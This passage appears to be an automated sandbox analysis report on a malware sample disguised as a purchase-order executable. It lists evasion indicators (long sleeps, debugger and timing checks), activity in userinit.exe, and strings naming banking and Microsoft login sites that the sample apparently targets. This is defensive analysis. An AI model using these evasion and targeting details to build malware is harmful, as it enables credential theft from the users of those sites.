            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E rdtsc 3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 566Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 9407Jump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\userinit.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\PO-000001488.exe TID: 2344Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep count: 566 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep time: -1132000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep count: 9407 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 5040Thread sleep time: -18814000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe TID: 4508Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe TID: 4508Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00ABC290 FindFirstFileW,FindNextFileW,FindClose,8_2_00ABC290
            Source: C:\Users\user\Desktop\PO-000001488.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: A34E618M.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: discord.comVMware20,11696494690f
            Source: A34E618M.8.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: A34E618M.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: A34E618M.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: A34E618M.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3308429692.000000000113F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: A34E618M.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: A34E618M.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: A34E618M.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.2109377411.0000024CF7EBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: A34E618M.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: A34E618M.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: A34E618M.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: A34E618M.8.drBinary or memory string: global block list test formVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: A34E618M.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: A34E618M.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: A34E618M.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: A34E618M.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: A34E618M.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151096E rdtsc 3_2_0151096E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004173A3 LdrLoadDll,3_2_004173A3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01568158 mov eax, dword ptr fs:[00000030h]3_2_01568158
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov eax, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov eax, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov ecx, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov eax, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01564144 mov eax, dword ptr fs:[00000030h]3_2_01564144
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6154 mov eax, dword ptr fs:[00000030h]3_2_014D6154
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6154 mov eax, dword ptr fs:[00000030h]3_2_014D6154
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC156 mov eax, dword ptr fs:[00000030h]3_2_014CC156
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01590115 mov eax, dword ptr fs:[00000030h]3_2_01590115
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov ecx, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A118 mov eax, dword ptr fs:[00000030h]3_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov eax, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E10E mov ecx, dword ptr fs:[00000030h]3_2_0157E10E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01500124 mov eax, dword ptr fs:[00000030h]3_2_01500124
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154E1D0 mov eax, dword ptr fs:[00000030h]3_2_0154E1D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015961C3 mov eax, dword ptr fs:[00000030h]3_2_015961C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015961C3 mov eax, dword ptr fs:[00000030h]3_2_015961C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015001F8 mov eax, dword ptr fs:[00000030h]3_2_015001F8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A61E5 mov eax, dword ptr fs:[00000030h]3_2_015A61E5
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155019F mov eax, dword ptr fs:[00000030h]3_2_0155019F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C188 mov eax, dword ptr fs:[00000030h]3_2_0158C188
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C188 mov eax, dword ptr fs:[00000030h]3_2_0158C188
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01510185 mov eax, dword ptr fs:[00000030h]3_2_01510185
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574180 mov eax, dword ptr fs:[00000030h]3_2_01574180
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01574180 mov eax, dword ptr fs:[00000030h]3_2_01574180
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556050 mov eax, dword ptr fs:[00000030h]3_2_01556050
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2050 mov eax, dword ptr fs:[00000030h]3_2_014D2050
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FC073 mov eax, dword ptr fs:[00000030h]3_2_014FC073
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01554000 mov ecx, dword ptr fs:[00000030h]3_2_01554000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566030 mov eax, dword ptr fs:[00000030h]3_2_01566030
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA020 mov eax, dword ptr fs:[00000030h]3_2_014CA020
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC020 mov eax, dword ptr fs:[00000030h]3_2_014CC020
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015520DE mov eax, dword ptr fs:[00000030h]3_2_015520DE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015120F0 mov ecx, dword ptr fs:[00000030h]3_2_015120F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D80E9 mov eax, dword ptr fs:[00000030h]3_2_014D80E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA0E3 mov ecx, dword ptr fs:[00000030h]3_2_014CA0E3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015560E0 mov eax, dword ptr fs:[00000030h]3_2_015560E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC0F0 mov eax, dword ptr fs:[00000030h]3_2_014CC0F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D208A mov eax, dword ptr fs:[00000030h]3_2_014D208A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015960B8 mov eax, dword ptr fs:[00000030h]3_2_015960B8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015960B8 mov ecx, dword ptr fs:[00000030h]3_2_015960B8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015680A8 mov eax, dword ptr fs:[00000030h]3_2_015680A8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01578350 mov ecx, dword ptr fs:[00000030h]3_2_01578350
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov ecx, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159A352 mov eax, dword ptr fs:[00000030h]3_2_0159A352
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157437C mov eax, dword ptr fs:[00000030h]3_2_0157437C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC310 mov ecx, dword ptr fs:[00000030h]3_2_014CC310
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F0310 mov ecx, dword ptr fs:[00000030h]3_2_014F0310
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015743D4 mov eax, dword ptr fs:[00000030h]3_2_015743D4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015743D4 mov eax, dword ptr fs:[00000030h]3_2_015743D4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov ecx, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C3CD mov eax, dword ptr fs:[00000030h]3_2_0158C3CD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015563C0 mov eax, dword ptr fs:[00000030h]3_2_015563C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015063FF mov eax, dword ptr fs:[00000030h]3_2_015063FF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F438F mov eax, dword ptr fs:[00000030h]3_2_014F438F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F438F mov eax, dword ptr fs:[00000030h]3_2_014F438F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A250 mov eax, dword ptr fs:[00000030h]3_2_0158A250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A250 mov eax, dword ptr fs:[00000030h]3_2_0158A250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6259 mov eax, dword ptr fs:[00000030h]3_2_014D6259
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01558243 mov eax, dword ptr fs:[00000030h]3_2_01558243
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01558243 mov ecx, dword ptr fs:[00000030h]3_2_01558243
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA250 mov eax, dword ptr fs:[00000030h]3_2_014CA250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C826B mov eax, dword ptr fs:[00000030h]3_2_014C826B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C823B mov eax, dword ptr fs:[00000030h]3_2_014C823B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E284 mov eax, dword ptr fs:[00000030h]3_2_0150E284
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E284 mov eax, dword ptr fs:[00000030h]3_2_0150E284
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
